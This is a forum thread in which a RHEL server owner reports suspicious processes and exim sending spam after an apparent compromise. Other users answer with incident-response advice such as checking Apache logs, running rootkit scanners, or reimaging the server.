server compromised?
 

hi , i have like these following showing up in my ps,

- r0nin
- bindz
- bd

hmm, im running a rhel and it seems someone is using my server to send spam mails.

i have alot of load going to exim on my server, most seem to be targeting brazil...

any help or advice is greatly appreciated, asap.

thank you.

Here is a part of the exim processes

root 23186 0.1 0.3 9028 3296 ? S 13:29 0:00 /usr/sbin/exim -Mc 1ESh2s-00061w-HR
mail 23190 0.0 0.3 9028 3344 ? S 13:29 0:00 \_ /usr/sbin/exim -Mc 1ESh2s-00061w-HR
root 24288 0.1 0.3 9032 3296 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
mail 24290 0.0 0.3 9032 3332 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
root 24359 0.5 0.3 9032 3292 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
mail 24364 0.0 0.3 9044 3384 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
root 24676 0.6 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
mail 24677 0.6 0.3 9032 3312 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
root 24760 0.5 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-DO
mail 24764 0.1 0.3 9032 3308 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-D
root 24864 2.1 0.3 8908 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
mail 24867 0.1 0.3 9036 3320 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
root 24925 1.6 0.3 8900 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
mail 24929 0.0 0.3 9028 3312 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
root 24932 2.1 0.3 9024 3292 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 24962 1.6 0.3 9024 3336 ? S 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 25020 14.0 0.3 9032 3348 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi
mail 25037 0.0 0.1 6584 1852 ? R 13:32 0:00 \_ /usr/sbin/exim -t -oem -oi -f <> -E1ESh5B-0006VW-Qi
root 25032 0.0 0.3 9028 3296 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB
mail 25036 0.0 0.3 9028 3336 ? R 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB

Wipe the server. Hire an admin. This round is over.

Looks like a typical vulnerable web script comprimise, are all those processes running as the apache user?

If this is a shared/cpanel box, grep for these binary names in /usr/local/apache/domlogs and try to locate the virtual host they came in by. Which should lead you to the bug. (Most likely a php based forum or CMS)


This script will help you detect these type of attacks next time.
http://www.thunkers.net/~navs/public/nobody-knows.sh

Check out this guide here: http://www.eth0.us/hacked

eth00 has some very good guides about everything!

run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html
if its not a root compromise, there should not be a need for reinstall

There are some rookits that cannot be detected by those methods. I would be VERY cautious since he has root owned files he did not create AND he changed root passwords but they are still being created. There is something weird going on and he will most likely need to take awhile to investigate it or just reimage.

how much would one charge to have a complete protection of my server from this point?

I would recommend you contact someone like www.totalservesolutions.com I have used them and they are quite good!

won't object
you got more info about the incident? didnt see that part posted